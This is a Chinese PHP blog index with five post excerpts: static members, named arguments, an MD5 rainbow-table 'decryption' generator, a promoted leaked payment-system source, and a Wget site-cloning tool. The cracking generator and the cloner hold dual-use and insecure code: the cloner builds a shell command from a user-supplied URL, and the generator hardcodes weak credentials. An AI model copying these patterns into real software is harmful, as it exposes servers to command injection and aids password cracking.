21
0
2025-01-04
掌握 PHP 静态成员:self::, parent::, static:: 详解
图片 在 PHP 中,静态成员(包括方法和属性)直接隶属于类,而非类的实例对象。这意味着我们无需实例化对象,就能直接访问类的静态成员。这一特性在需要跨对象共享数据或功能时尤为有用。 PHP 提供了 self::,parent:: 和 static:: 三个关键字来访问静态成员,它们各自拥有不同的工作机制,尤其是在继承关系中。本文将深入解析这三个关键字的运作原理,并结合实例阐明它们之间的区别。 何时使用静态成员 模拟全局变量: 将静态属性视为类内部的全局变量,所有实例都能共享访问。 提供工具方法: 静态方法适用于提供独立于具体对象实例的实用功能。 定义类常量: 使用静态属性定义类级别常量,确保其值在整个应用生命周期内保持不变。 实现单例模式: 静态方法和属性是实现单例模式(确保一个类只有一个实例)的关键要素。 调用静态方法 要调用静态方法,请使用 :: 运算符,后跟方法名称。 以下是示例: class MyClass { public static function greet() { echo "Hello, world!"; } } MyClass::greet(); // 输出: Hello, world!调用静态属性 要访问静态属性,也可以使用 :: 运算符,后跟属性名称。 以下是示例: class MyClass { public static $count = 0; public static function incrementCount() { self::$count++; } } MyClass::incrementCount(); echo MyClass::$count; // 输出: 1 Use code with caution.三个关键词:self::、、parent::和static 1. self:: self:: 关键字始终指向 代码编写的类 本身,不考虑任何继承关系。这意味着即使子类重写了父类的静态方法或属性,self:: 仍然会引用父类中定义的版本。 2. parent:: parent:: 关键字用于从 直接父类 中调用静态方法或属性。它会绕过子类中任何重写的方法或属性,确保使用的是 父类 的版本。 3. static:: static:: 关键字与 self:: 类似,但它引入了 后期静态绑定 机制。这意味着 static:: 会根据运行时环境动态地绑定到最 派生类 中的静态方法或属性,即使调用代码位于父类中。 举例说明差异 让我们看看这些关键字在具有继承的 PHP 程序中是如何表现的。 示例 1:使用self class A { public static function sayHello() { return "Hello from A"; } public static function test() { return self::sayHello(); } } class B extends A { public static function sayHello() { return "Hello from B"; } } echo B::test(); // 输出: "Hello from A"在这个例子中,self::sayHello() 语句出现在类 A 的代码中,因此 self:: 指向的是类 A 本身。 尽管类 B 重写了 sayHello() 方法,但由于 self:: 的绑定机制,程序仍然会调用 父类 A 中的 sayHello() 方法,最终输出 "Hello from A"。 示例 2:使用parent class A { public static function sayHello() { return "Hello from A"; } } class B extends A { public static function sayHello() { return parent::sayHello() . " and B"; } } echo B::sayHello(); // 输出: "Hello from A and B"在这个例子中,类 B 中的 parent::sayHello() 语句明确指示调用 父类 A 的 sayHello() 方法。因此,程序会先输出父类 A 中的消息,然后拼接上类 B 自身的消息,最终输出 "来自 A 和 B 的问候"。 示例 3:使用static class A { public static function sayHello() { return "Hello from A"; } public static function test() { return static::sayHello(); } } class B extends A { public static function sayHello() { return "Hello from B"; } } echo B::test(); // 输出: "Hello from B"这段代码中,static::sayHello() 语句位于类 A 中,但由于 static:: 支持后期静态绑定,它会指向 运行时确定的最底层派生类,也就是类 B。最终,程序调用的是类 B 中的 sayHello() 方法,输出 "Hello from B"。 主要区别 self::: 引用当前代码所在的类,不考虑继承关系。 当我们希望子类重写方法时,父类中的调用不受影响,就可以使用 self::。 parent::: 专门用于调用父类中的方法或属性,即使子类进行了重写。 当我们需要在子类中扩展父类的功能,但仍然希望保留对父类原始方法的访问权限时,就可以使用 parent::。 static::: 实现后期静态绑定,根据运行时环境动态绑定到最派生类的方法或属性。 当我们希望方法的行为能够根据调用它的类动态调整时,就可以使用 static::。 深入理解 self::,parent:: 和 static:: 之间的区别,有助于我们编写更加健壮、易于维护的面向对象 PHP 代码,尤其是在处理复杂的继承关系时。
技术教程
# PHP
易航
1月4日
0
37
0
2024-12-24
提升 PHP 代码质量:命名参数的最佳实践与示例
还在为PHP函数中繁多的参数和它们代表的含义而烦恼吗?还在费力数逗号以确保参数顺序正确吗?PHP 8.0 的命名参数将帮你解决这些问题!本指南将带你了解命名参数的概念、使用方法以及如何利用它们提升代码质量。 图片 什么是命名参数? 命名参数允许你通过指定参数名称,而不是依赖参数顺序,来向函数传递值。就像给每个参数都贴上了标签,代码因此更易读、更不易出错,避免了参数含义混淆不清的情况。 新旧方法对比 让我们来看一个电商应用中的实际例子,假设你正在构建一个创建新产品的功能: function createProduct( string $name, float $price, string $category, bool $inStock = true, int $quantity = 0, array $tags = [], string $description = '' ) { // 产品创建逻辑 } // 旧方法(位置参数) createProduct( '游戏鼠标', 49.99, '电子产品', true, 100, ['游戏', '配件'], '带 RGB 照明的高性能游戏鼠标' );如果不去查看函数定义,很难一眼看出上面代码中每个参数值的含义。现在,让我们看看命名参数是如何提高代码清晰度的: // 新方法(命名参数) createProduct( name: '游戏鼠标', price: 49.99, category: '电子产品', quantity: 100, tags: ['游戏', '配件'], description: '带 RGB 照明的高性能游戏鼠标' );命名参数的好处 提高代码可读性 命名参数本身就是一种代码文档。任何阅读代码的人都能立刻理解每个值的含义,无需再去查看函数定义。 跳过可选参数 使用命名参数,你可以跳过那些不需要设置的可选参数。 示例如下: function sendEmail( string $to, string $subject, string $body, ?string $replyTo = null, bool $isHtml = true, int $priority = 3 ) { // 电子邮件发送逻辑 } // 仅设置您需要的参数 sendEmail( to: 'customer@example.com', subject: 'Order Confirmation', body: $emailContent, priority: 1 // 跳过 replyTo和isHtml,使用其默认值 );参数顺序不再重要 使用命名参数时,参数的顺序不再重要。这种灵活性让代码维护更加轻松: // These are equivalent: sendEmail( body: $emailContent, subject: '订单确认', to: 'customer@example.com' ); sendEmail( to: 'customer@example.com', subject: '订单确认', body: $emailContent );混合使用命名参数和位置参数 你可以混合使用命名参数和位置参数,但需要注意:一旦开始使用命名参数,其后的所有参数也都必须使用命名参数: function createUser( string $username, string $email, string $password, bool $isAdmin = false, ?string $department = null ) { // 用户创建逻辑 } // Valid - positional arguments first, then named createUser( 'johnsmith', // username (位置) 'john@example.com', // email (位置) password: 'secure123', // 命名参数从这里开始 department: 'Sales' // 命名 );最佳实践 为了提高代码清晰度,当函数参数较多,或者参数的用途不容易从值本身判断时,请使用命名参数。 布尔值参数尤其适合使用命名参数,因为true或false本身并不能清晰地表达其含义。 // 不清楚 createUser('john', 'john@example.com', 'password123', true); // 更清楚 createUser( username: 'john', email: 'john@example.com', password: 'password123', isAdmin: true ); 保持一致性:如果在函数调用中使用命名参数,建议为所有参数命名以保持一致,除非开头几个参数的含义在上下文中非常清晰。 清晰的参数命名:由于参数名称现在是函数公共接口的一部分,请务必选择清晰且具有描述性的名称。 常见陷阱 避免在使用命名参数后混合使用位置参数:一旦开始使用命名参数,其后的所有参数也都必须使用命名参数。 // 将导致错误 createUser(username: 'john', 'john@example.com', password: 'secret'); // 正确 createUser(username: 'john', email: 'john@example.com', password: 'secret'); 注意参数名称的修改:重构代码时,如果修改了参数名称,那么使用旧参数名称的命名参数调用将会失效。请记住,参数名称现在是公共 API 的一部分。 结论 命名参数是 PHP 的一项强大功能,它能够显著提升代码的可读性、可维护性和正确性。当函数拥有多个可选参数,或者参数的含义不容易从值本身判断时,命名参数将尤为有用。 在你的 PHP 8+ 项目中积极采用命名参数,尤其是在它能够提升代码清晰度的地方。未来的你(以及你的同事)都会感激你写出了更具自解释性和可维护性的代码。 记住:优秀的代码不仅仅是能够正常工作,更要清晰易懂且易于维护。命名参数正是你编写高质量 PHP 代码的利器之一。
技术教程
# PHP
易航
1年前
0
29
0
2024-12-24
PHP自建MD5解密平台
使用 PHP 构建 MD5 彩虹表生成器的完整过程 在信息安全领域,彩虹表(Rainbow Table) 是一种通过预计算哈希值和对应原始值的方式来破解密码的工具。为了实现一个简单高效的 MD5 彩虹表生成器,我使用了 PHP 和 MySQL,本文将详细介绍整个实现过程,并深入探讨如何解决开发中遇到的问题。 项目背景和需求 在项目的初始阶段,我们需要一个自动化生成 MD5 彩虹表的工具,并将生成的数据存储在 MySQL 数据库中。主要功能包括: 批量生成 MD5 哈希和对应的原始字符串 去重处理,避免重复存储相同的 MD5 哈希 可扩展性,支持任意字符集和字符串长度。 高效插入数据,避免性能瓶颈。 然而,在实现的过程中遇到了两个关键问题: 每次刷新页面时,因没有去重导致重复数据大量生成。 设置批量生成的目标条数(如 10,000 条),但数据量却无法稳定在目标值。 接下来,我们将详细拆解整个解决方案和代码实现。 环境准备 确保开发环境的搭建,包括: PHP 7.x或更高版本 MySQL 5.x或更高版本 Apache或Nginx服务器 数据库设计 在生成彩虹表之前,我们需要设计存储数据的数据库表。 数据表结构 表名为 rainbow_table,包含以下字段: id: 自增主键,用于标识每条记录。s hash: 存储 MD5 哈希值。 original: 存储原始字符串。 unique_hash: 创建唯一约束,确保哈希值不重复。 SQL 表的创建代码如下: CREATE TABLE rainbow_table ( id INT(6) UNSIGNED AUTO_INCREMENT PRIMARY KEY, hash VARCHAR(32) NOT NULL, original VARCHAR(255) NOT NULL, UNIQUE KEY unique_hash (hash) );如果表不存在,我们会在 PHP 脚本中动态创建它,确保代码的鲁棒性。 PHP 脚本实现 核心逻辑概述 字符集配置:可以自由定义生成字符串所使用的字符集,包括大小写字母、数字和特殊符号。 随机生成字符串:通过随机组合字符,生成指定长度的字符串。 MD5 哈希计算:将随机字符串计算为 MD5 哈希值。 数据插入与去重:使用 INSERT IGNORE 避免重复插入。 批量生成与页面自动刷新:每次生成一定数量的数据后自动刷新页面,持续生成。 完整 PHP 代码如下: <?php $servername = "localhost"; $username = "md5"; $password = "123456"; $dbname = "md5"; $tableName = "rainbow_table"; // 创建数据库连接 $conn = new mysqli($servername, $username, $password, $dbname); // 检查连接是否成功 if ($conn->connect_error) { die("连接失败: " . $conn->connect_error); } // 检查表是否存在,如果不存在则创建 $tableExists = $conn->query("SHOW TABLES LIKE '$tableName'")->num_rows > 0; if (!$tableExists) { $createTableSql = "CREATE TABLE $tableName ( id INT(6) UNSIGNED AUTO_INCREMENT PRIMARY KEY, hash VARCHAR(32) NOT NULL, original VARCHAR(255) NOT NULL, UNIQUE KEY unique_hash (hash) )"; if ($conn->query($createTableSql) === TRUE) { echo "表 $tableName 创建成功<br>"; } else { die("创建表错误: " . $conn->error); } } // 彩虹表生成函数 function generateRainbowTable($charset, $batchSize, $conn, $tableName) { $charsetLength = strlen($charset); $count = 0; $maxLength = 18; // 设置随机字符串最大长度 while ($count < $batchSize) { // 随机生成字符串长度 $length = rand(1, $maxLength); $count += generateRandomCombination($charset, $length, $charsetLength, $conn, $batchSize - $count, $tableName); } echo "生成了 $count 条记录\n"; } function generateRandomCombination($charset, $length, $charsetLength, $conn, $remaining, $tableName) { if ($remaining <= 0) return 0; $currentString = ''; for ($i = 0; $i < $length; $i++) { $currentString .= $charset[rand(0, $charsetLength - 1)]; } $hash = md5($currentString); // 使用 INSERT IGNORE 避免重复插入 $stmt = $conn->prepare("INSERT IGNORE INTO $tableName (hash, original) VALUES (?, ?)"); $stmt->bind_param("ss", $hash, $currentString); $stmt->execute(); return $stmt->affected_rows > 0 ? 1 : 0; } // 配置 $charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789.@#*?!$%^&()-_=+[]{}|;:,.<>~'; // 定义字符集 $batchSize = 2000; // 每次生成 2000 条 generateRainbowTable($charset, $batchSize, $conn, $tableName); $conn->close(); ?>关键点解析 1. 随机生成字符串 $length = rand(1, $maxLength); $currentString .= $charset[rand(0, $charsetLength - 1)];使用 rand() 随机生成字符串长度,再通过字符集随机组合字符,生成目标字符串。 2. 避免重复插入 $stmt = $conn->prepare("INSERT IGNORE INTO $tableName (hash, original) VALUES (?, ?)");使用 INSERT IGNORE 确保插入数据时,遇到重复哈希值会自动跳过,避免浪费资源。 3. 批量生成与计数 $count += generateRandomCombination($charset, $length, $charsetLength, $conn, $batchSize - $count, $tableName);每次生成一定数量的数据,直到达到目标批量数量。 前端自动刷新页面 为了实现自动化生成,我们在前端页面使用 JavaScript 设置定时刷新,每次刷新生成一批数据: <script> // 页面加载完成后自动刷新 window.onload = function() { setTimeout(function() { location.reload(); }, 1000); // 1秒后刷新页面 }; </script>通过这种方式,可以在页面刷新时持续调用生成函数,直到数据库存储满足预期需求。 问题与优化方案 问题 1:重复数据导致效率低下 最初代码未去重,每次刷新生成的大量数据包含重复项,浪费了存储和计算资源。通过添加 INSERT IGNORE 和数据库唯一索引,解决了此问题。 问题 2:生成数据量不足 由于生成逻辑中可能因重复数据导致插入失败,数据总量无法达到目标条数。通过调整随机生成逻辑,确保生成字符串更加分散,提高了数据覆盖率。 结论 本文通过详细介绍一个 PHP 实现的 MD5 彩虹表生成器,展示了从数据库设计到代码优化的完整流程。通过随机生成字符串、去重插入以及前端自动刷新机制,实现了高效的批量生成工具。 该工具不仅适用于 MD5,还可拓展为其他哈希算法生成器(如 SHA-1 或 SHA-256)。未来可进一步优化数据生成算法,提高生成速度和覆盖范围。 最后我的MD5解密平台:隐藏内容,请前往内页查看详情 图片 项目地址 隐藏内容,请前往内页查看详情
源码资源
技术教程
# 网站源码
# PHP源码
# PHP
易航
1年前
2
68
1
2024-12-17
全新重构聚支付系统免费版
全新重构聚支付系统最新内测版意外流出! 而且是免费版本,没有授权什么的乱七八糟的东西 源码简介 全新超好看后台UI,有图有真相,必须赞一波 巨好看的后台全面统计 有数据大屏功能和数据地区统计功能 支持订单投诉和投诉管理 支持用户组功能并且用户可以自定义购买套餐 全新首页模板高达12个并且支持自定义切换 支持支付封控检测高达三十多种支付插件,支持支付通道轮训 商户系统支持个人实名和企业实名功能 总之就是彩虹易支付该有的功能都有,彩虹易支付没有的功能也有 环境配置 PHP:8.1 MySql:5.6+ 源码截图 图片 图片 图片 源码下载 隐藏内容,请前往内页查看详情
免费资源
源码资源
# 网站源码
# PHP源码
# PHP
易航
1年前
5
79
0
2024-12-10
PHP 实现 Wget 在线仿站工具
引言 项目的核心是使用PHP处理用户请求,通过SSH连接服务器执行爬取命令,并将结果发送到用户邮箱。 功能概述 该工具具备以下功能: 输入有效的URL和邮箱。 验证URL格式。 通过SSH连接执行Wget命令抓取网页。 生成ZIP文件并通过邮箱通知用户。 页面结构 页面使用Bootstrap框架实现响应式设计。以下是页面的基本HTML结构示例: <!DOCTYPE html> <html lang="zh-cn"> <head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <title>在线仿站工具</title> <link rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/4.3.1/css/bootstrap.min.css"> </head> <body> <nav class="navbar sticky-top navbar-expand-lg navbar-light bg-white border-bottom"> <div class="container"> <a class="navbar-brand" href="./">在线仿站工具</a> </div> </nav> <div class="container mt-5"> <div class="row"> <div class="col-md-8 offset-md-2"> <input type="text" id="url" class="form-control" placeholder="请输入有效的网址" required /> <input type="text" id="email" class="form-control mt-2" placeholder="请输入有效的邮箱" required /> <input id="submit" type="button" value="提交任务" class="btn btn-primary btn-block mt-3" /> </div> </div> </div> <script src="./assets/js/common.js"></script> </body> </html>图片 后端逻辑 后端使用PHP实现,主要功能集中在api.php文件中。以下是该文件的核心代码示例: 1. 请求处理 首先,我们检查请求方法是否为POST,并获取URL和邮箱: <?php if ($_SERVER['REQUEST_METHOD'] !== 'POST') { exit(json_encode(array('code' => '-1', 'msg' => '仅支持POST请求'), JSON_UNESCAPED_UNICODE | JSON_PRETTY_PRINT)); } $url = $_POST['url']; $email = $_POST['email'];2. URL验证 使用正则表达式验证输入的URL格式,确保用户输入的是有效的URL: $preg = "/^http(s)?:\\/\\/.+/"; if (!preg_match($preg, $url)) { log_error("Invalid URL format: $url"); exit(json_encode(array('code' => '-1', 'msg' => '域名请带上协议头!如(http:// 或 https://)'), JSON_UNESCAPED_UNICODE | JSON_PRETTY_PRINT)); }3. 生成文件名 生成唯一的文件名以便于后续的下载: $timestamp = time(); $file = "website_$timestamp.zip";4. 执行SSH命令 通过自定义的SSH类连接到服务器并执行Wget命令: $ssh = new Components_Ssh($host, $user, $pass, $port, $log); $command = escapeshellcmd("bash /www/wwwroot/{$site_url}/wget_site.sh {$url} {$file} >/dev/null && echo \"success\""); $result = $ssh->cmd($command);5. 检查文件生成状态 检查文件是否成功生成,若未生成,则记录错误信息: if (!file_exists('./down/' . $file)) { log_error("File generation failed for: $url"); exit(json_encode(array('code' => '-1', 'msg' => '爬取失败,请稍后再试。'), JSON_UNESCAPED_UNICODE | JSON_PRETTY_PRINT)); }6. 发送邮件通知 发送爬取结果到用户邮箱的代码如下: $content = '爬取成功,下载链接:' . $site_url . '/down/' . $file; $wz = $smtpapi . "?adress=" . urlencode($email) . "&isHTML=false&title={$site_url}爬取成功&content=" . urlencode($content); $response = @file_get_contents($wz);7. 错误日志记录 使用自定义的log_error函数记录所有错误信息,确保系统的可维护性: function log_error($message) { error_log(date('Y-m-d H:i:s') . " - " . $message . "\n", 3, '/path/to/error.log'); }8. SSH连接类 以下是一个简单的SSH连接类示例,供后续使用: class Components_Ssh { private $connection; public function __construct($host, $user, $pass, $port = 22) { $this->connection = ssh2_connect($host, $port); ssh2_auth_password($this->connection, $user, $pass); } public function cmd($command) { $stream = ssh2_exec($this->connection, $command); stream_set_blocking($stream, true); return stream_get_contents($stream); } }9. Wget脚本示例 wget_site.sh脚本负责执行实际的爬取操作,代码示例如下: #!/bin/bash url=$1 file=$2 wget --mirror --convert-links --adjust-extension --page-requisites --no-parent $url -P /www/wwwroot/your_site/down/ zip -r /www/wwwroot/your_site/down/$file /www/wwwroot/your_site/down/*10. 处理返回结果 处理执行命令后的返回结果以便后续使用: if ($result === 'success') { exit(json_encode(array('code' => '1', 'msg' => '爬取任务已提交,请查看邮箱。'), JSON_UNESCAPED_UNICODE | JSON_PRETTY_PRINT)); } else { log_error("Command execution failed: $command"); exit(json_encode(array('code' => '-1', 'msg' => '命令执行失败,请重试。'), JSON_UNESCAPED_UNICODE | JSON_PRETTY_PRINT)); }11. 提交任务前的提示 在前端添加任务提交前的提示,增强用户体验: document.getElementById('submit').onclick = function() { const url = document.getElementById('url').value; const email = document.getElementById('email').value; if (url === '' || email === '') { alert('请填写所有字段!'); return; } fetch('api.php', { method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded' }, body: `url=${encodeURIComponent(url)}&email=${encodeURIComponent(email)}` }) .then(response => response.json()) .then(data => { if (data.code === '-1') { alert(data.msg); } else { alert('任务已提交,请查看您的邮箱!'); } }); };12. 邮件发送状态检查 检查邮件发送状态以确保用户能够及时收到通知: if ($response === false) { log_error("Email failed to send to: $email"); exit(json_encode(array('code' => '-1', 'msg' => '邮件发送失败,请检查邮箱地址。'), JSON_UNESCAPED_UNICODE | JSON_PRETTY_PRINT)); }核心技术 PHP:后端逻辑处理,包括请求处理和SSH命令执行。 SSH:使用SSH连接到服务器进行远程操作。 Wget:爬取网页及其资源的工具。 Bootstrap:用于简化前端布局和样式。 总结 这个在线仿站工具允许用户快速爬取并下载网站资源。关键在于安全地处理用户输入、稳定地执行后端爬取操作,并确保系统的可维护性。
技术教程
# PHP
易航
1年前
0
52
1
上一页
1
2
3
...
6
下一页